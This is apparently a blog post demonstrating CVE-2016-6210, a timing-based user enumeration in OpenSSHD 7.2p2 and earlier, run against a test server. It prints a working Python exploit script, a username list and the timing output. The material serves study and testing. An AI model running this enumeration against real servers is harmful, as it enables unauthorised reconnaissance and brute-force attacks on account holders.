CVE 2016-6210 OpenSSHD user enumeration

The 13th if July a new wild CVE appeared (Yes, Pokemon Go is still a buzz for the moment).

The CVE 2016-6210 allow a user enumeration on an SSH server by comparing request time between non existing user and allowed ones. This vulnerability target OpenSSHD with a version of 7.2p2 or inferior.

That means with a good dictionary you may know which user are present on the server with an SSH access.

This post just demonstrate how to exploit this vulnerability with a simple example.

OpenSSHD <= 7.2p2 - User Enumeration

A tiny python script is present on exploit-db. I had to modify it a bit in order to pass the username in parameter:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#!/bin/python

import paramiko
import time
import sys
user = sys.argv[1]
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
         ssh.connect('192.168.4.231', username=user,
         password=p)
except:
         endtime=time.clock()
total=endtime-starttime
print(str(user)+ ": " +str(total))

The script will simply try to connect to 192.168.4.231 with the user passed in parameter and a password of 25 000 'A' and measure the time of the connection.

We create a simple list of possible user with a non existing user to be able to compare connection times.

[maggick@computer_name tmp]$ cat list
nonExistsingUserForSure
john
root
bob
user
alice
max
ssh_user

We launch the script against our test server:

[maggick@computer_name tmp]$ while read l; do ./p.py $l; done < list
nonExistsingUserForSure: 0.17941999999999997
john: 0.18687900000000002
root: 0.18173099999999998
bob: 0.178726
user: 0.23088699999999995
alice: 0.13389600000000002
max: 0.17069700000000004
ssh_user: 0.24780699999999997

We can easily see that SSH root login is disallowed, and that the user user and ssh_user are allowed to connect to the server using SSH.

As often with brute force, the major issue will be to build the dictionary but some tools like CeWL from digininja can help build it.